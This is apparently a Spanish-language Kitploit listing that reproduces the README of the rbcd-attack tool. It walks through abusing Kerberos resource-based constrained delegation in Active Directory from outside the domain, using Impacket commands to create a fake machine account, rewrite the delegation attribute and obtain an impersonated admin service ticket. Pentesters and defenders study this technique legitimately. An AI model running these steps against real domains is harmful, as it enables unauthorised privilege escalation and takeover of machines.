Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/tothi/rbcd-attack
Escalada de PrivilegiosExplotaciónPruebas de Penetración
GitHubtothi/rbcd-attack

rbcd-attack

Ataque de delegación restringida basada en recursos de Kerberos desde el exterior utilizando Impacket

Ver Repositorio
64672hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Abusando de la Delegación Restringida Basada en Recursos de Kerberos

TL;DR

Este repositorio trata sobre un ataque práctico contra la Delegación Restringida Basada en Recursos de Kerberos en un Dominio de Active Directory de Windows.

La diferencia con otras implementaciones comunes es que lanzamos el ataque desde fuera del Dominio de Windows, no desde un equipo unido al dominio (normalmente Windows).

El ataque está implementado usando únicamente Python3 Impacket (y sus dependencias). Probado en Arch con Impacket actualizado (0.9.21 al momento de escribir).

Attack Log

El Ataque

En resumen, sin entrar en detalles profundos, el ataque se dirige a un equipo del dominio, exactamente a los principales de servicio relacionados con el equipo del dominio objetivo.

Lo que necesitamos como requisitos previos:

  • una cuenta de dominio con acceso de escritura al equipo objetivo (exactamente acceso de escritura a la propiedad msDS-AllowedToActOnBehalfOfOtherIdentity del objeto de equipo del dominio objetivo)
  • permiso para crear nuevas cuentas de equipo (esto suele ser predeterminado, consulte MachineAccountQuota)
  • acceso LDAP (389/tcp) y SAMR (445/tcp) (o LDAPS (636/tcp)) al DC.
  • acceso Kerberos (88/tcp) al DC

La ruta del ataque a muy alto nivel:

  1. Crear un equipo falso
  2. Abusar de la propiedad msDS-AllowedToActOnBehalfOfOtherIdentity del objetivo
  3. Solicitar Tickets de Servicio suplantados (S4U) para el equipo objetivo

Beneficio:

  • Los Tickets de Servicio suplantados pueden permitir acceso de alto nivel a servicios en el objetivo como CIFS, HTTP, etc., si la cuenta suplantada tiene privilegios. A veces, la toma de control del equipo.

Herramientas comunes

Las herramientas comunes para este ataque operan en un equipo Windows unido al dominio usando:

  • Powermad para agregar nuevas cuentas de equipo
  • Powerview de la rama de desarrollo de PowerSploit para abusar de msDS-AllowedToActOnBehalfOfOtherIdentity
  • Rubeus para operaciones de tickets S4U

Implementación con Impacket

Esta implementación utiliza Impacket puro desde fuera del Dominio.

Creando el equipo falso

Usando el ejemplo addcomputer.py de Impacket, creemos un equipo falso (llamado evilcomputer):

root@kitploit:~
addcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0

Modificando los derechos de delegación

Se implementó el script rbcd.py que se encuentra aquí en el repositorio, el cual agrega el descriptor de seguridad relacionado del EVILCOMPUTER recién creado a la propiedad msDS-AllowedToActOnBehalfOfOtherIdentity del equipo objetivo.

root@kitploit:~
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0

El script utiliza en gran medida las clases de Python del ejemplo ntlmrelayx.py de Impacket. Para obtener ayuda y un ejemplo, ejecute el script sin opciones.

Obteniendo el ticket de servicio suplantado

Ahora todo está listo para abusar de la Delegación Restringida mediante una consulta S4U2Self y obtener un Ticket de Servicio suplantado para el equipo objetivo. Con el script de ejemplo getST.py de Impacket:

root@kitploit:~
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS

El comando anterior obtiene un Ticket de Servicio CIFS en nombre del usuario de dominio objetivo admin y lo almacena en el archivo admin.ccache.

Después de agregar la ruta del archivo a la variable KRB5CCNAME, el ticket es utilizable para clientes Kerberos.

root@kitploit:~
export KRB5CCNAME=`pwd`/admin.ccache
klist

Referencias

Para más detalles sobre el abuso de la Delegación Restringida Basada en Recursos:

  • https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
  • https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/
  • http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/

Y una de las presentaciones más completas sobre Ataques Kerberos:

  • Constructing Kerberos Attacks with Delegation Primitives slides en Defcon por Elad Shamir y Matt Bush
Descargar herramienta